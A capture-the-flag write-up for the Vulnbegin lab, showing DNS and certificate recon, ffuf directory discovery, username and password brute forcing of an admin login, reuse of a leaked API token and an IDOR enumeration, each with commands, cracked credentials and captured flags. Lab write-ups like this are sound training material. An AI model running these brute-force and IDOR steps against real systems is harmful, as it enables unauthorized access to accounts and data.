Vulnbegin

Subdomain Discovery

DNS Infos

nslookup -type=any vulnbegin.co.uk 8.8.8.8

Server:		8.8.8.8
Address:	8.8.8.8#53

Non-authoritative answer:
Name:	vulnbegin.co.uk
Address: 68.183.255.206
vulnbegin.co.uk	nameserver = ns1.digitalocean.com.
vulnbegin.co.uk	nameserver = ns2.digitalocean.com.
vulnbegin.co.uk	nameserver = ns3.digitalocean.com.
vulnbegin.co.uk
	origin = ns1.digitalocean.com
	mail addr = hostmaster.vulnbegin.co.uk
	serial = 1626211765
	refresh = 10800
	retry = 3600
	expire = 604800
	minimum = 1800
vulnbegin.co.uk	text = "[^FLAG^BED649C4DB2DF265BD29419C13D82117^FLAG^]"

Authoritative answers can be found from

DNS Bruteforce

dnsrecon -d vulnbegin.co.uk -D ~/Dokumente/ctfchallenge/wordlists/subdomains.txt -t brt

[*] Performing host and subdomain brute force against vulnbegin.co.uk
[*] 	 A server.vulnbegin.co.uk 68.183.255.206
[*] 	 A www.vulnbegin.co.uk 68.183.255.206
[+] 2 Records Found
curl -H "Cookie: ctfchallenge=CENSORED" http://server.vulnbegin.co.uk

{"error":"User Not Authenticated","flag":"[^FLAG^E858ED9649E57BECE9ACD1A4C60D3446^FLAG^]"}%

SSL Certificate Records

A great resource for these SSL records is crt.sh if you visit https://crt.sh/?q=vulnbegin.co.uk you'll be able to see records of SSL certificates that have been registered for vulnbegin.co.uk

Common Name
Matching Identities

v64hss83.vulnbegin.co.uk

v64hss83.vulnbegin.co.uk

vulnbegin.co.uk

*.vulnbegin.co.uk / vulnbegin.co.uk

Checking Domain v64hss83.vulnbegin.co.uk

curl -H "Cookie: ctfchallenge=CENSORED" http://v64hss83.vulnbegin.co.uk

[^FLAG^047524FE61AE6B5FD1D184994C7322FC^FLAG^]

Content Discovery

ffuf -w ~/Dokumente/ctfchallenge/wordlists/content.txt -t 1 -p 0.1 -H "Cookie: ctfchallenge=CENSORED" -u http://www.vulnbegin.co.uk/FUZZ -mc all -fc 404
=> Results <=
cpadmin
css
js
robots.txt
curl -H "Cookie: ctfchallenge=CENSORED" http://www.vulnbegin.co.uk/robots.txt
User-agent: *
Disallow: /secret_d1rect0y/% 
curl -H "Cookie: ctfchallenge=CENSORED" http://www.vulnbegin.co.uk/secret_d1rect0y
[^FLAG^2B22E2CB70E218510802B0359488F6A2^FLAG^]%  

Brute Force

Checking for Valid Users

./ffuf -w ~/Dokumente/ctfchallenge/wordlists/usernames.txt -X POST -d "username=FUZZ&password=x" -t 1 -p 0.1 -H "Cookie: ctfchallenge=CENSORED" -H "Content-Type: application/x-www-form-urlencoded" -u http://www.vulnbegin.co.uk/cpadmin/login -fr 'Username is invalid'
admin                   [Status: 200, Size: 1483, Words: 422, Lines: 37]

Bruteforcing Password

./ffuf -w ~/Dokumente/ctfchallenge/wordlists/passwords.txt -X POST -d "username=admin&password=FUZZ" -t 1 -p 0.1 -H "Cookie: ctfchallenge=CENSORED" -H "Content-Type: application/x-www-form-urlencoded" -u http://www.vulnbegin.co.uk/cpadmin/login -fr 'Password is invalid'
159753                  [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 31ms]

Flag

Login to http://www.vulnbegin.co.uk/cpadmin using credentials admin:159753 Flag: [^FLAG^93D7491FB4B054FB5C5AC3E0292BE41C^FLAG^]

Content Discovery #2

./ffuf -w ~/Dokumente/ctfchallenge/wordlists/content.txt -t 1 -p 0.1 -H "Cookie: ctfchallenge=CENSORED" -u http://www.vulnbegin.co.uk/cpadmin/FUZZ -mc all -fc 404
env                     [Status: 200, Size: 111, Words: 2, Lines: 1]

Visiting http://www.vulnbegin.co.uk/cpadmin/env we find the flag and a probably interesting header X-Token for the api {"api_key":"X-Token: 492E64385D3779BC5F040E2B19D67742","flag":"[^FLAG^F6A691584431F9F2C29A3A2DE85A2210^FLAG^]"}

API Recon

Check the API

curl -H "X-Token: 492E64385D3779BC5F040E2B19D67742" -H "Cookie: ctfchallenge=CENSORED" http://server.vulnbegin.co.uk
{"messaged":"User Authenticated","flag":"[^FLAG^0BDC60CC5E283476E7107C814C18DCCF^FLAG^]"}%

Search for API Endpoints

./ffuf -w ~/Dokumente/ctfchallenge/wordlists/content.txt -t 1 -p 0.1 -H "X-Token: 492E64385D3779BC5F040E2B19D67742" -H "Cookie: ctfchallenge=CENSORED" -u http://server.vulnbegin.co.uk/FUZZ -mc all -fc 404
user                    [Status: 200, Size: 89, Words: 1, Lines: 1]
curl -H "X-Token: 492E64385D3779BC5F040E2B19D67742" -H "Cookie: ctfchallenge=CENSORED" http://server.vulnbegin.co.uk/user
{"id":27,"endpoint":"\/user\/27"}
curl -H "X-Token: 492E64385D3779BC5F040E2B19D67742" -H "Cookie: ctfchallenge=CENSORED" http://server.vulnbegin.co.uk/user/27
{"id":27,"username":"vulnbegin_website","endpoint":"\/user\/27\/info"}
curl -H "X-Token: 492E64385D3779BC5F040E2B19D67742" -H "Cookie: ctfchallenge=CENSORED" http://server.vulnbegin.co.uk/user/27/info
{"id":27,"username":"vulnbegin_website","description":"User for the main website","flag":"[^FLAG^7B3A24F3368E71842ED7053CF1E51BB0^FLAG^]"}% 

Check for IDOR

seq 1 100 | ./ffuf -w - -t 1 -p 0.1 -H "X-Token: 492E64385D3779BC5F040E2B19D67742" -H "Cookie: ctfchallenge=CENSORED" -u http://server.vulnbegin.co.uk/user/FUZZ -mc all -fc 404
5                       [Status: 403, Size: 48, Words: 9, Lines: 1, Duration: 32ms]
27                      [Status: 200, Size: 70, Words: 1, Lines: 1, Duration: 31ms]
curl -H "X-Token: 492E64385D3779BC5F040E2B19D67742" -H "Cookie: ctfchallenge=CENSORED" http://server.vulnbegin.co.uk/user/5
["You do not have permission to view this user"]
curl -H "X-Token: 492E64385D3779BC5F040E2B19D67742" -H "Cookie: ctfchallenge=CENSORED" http://server.vulnbegin.co.uk/user/5/info
{"id":5,"username":"admin","description":"admin for the server","flag":"[^FLAG^3D82BE780F46EE86CE060D23E6E80639^FLAG^]"}

Last updated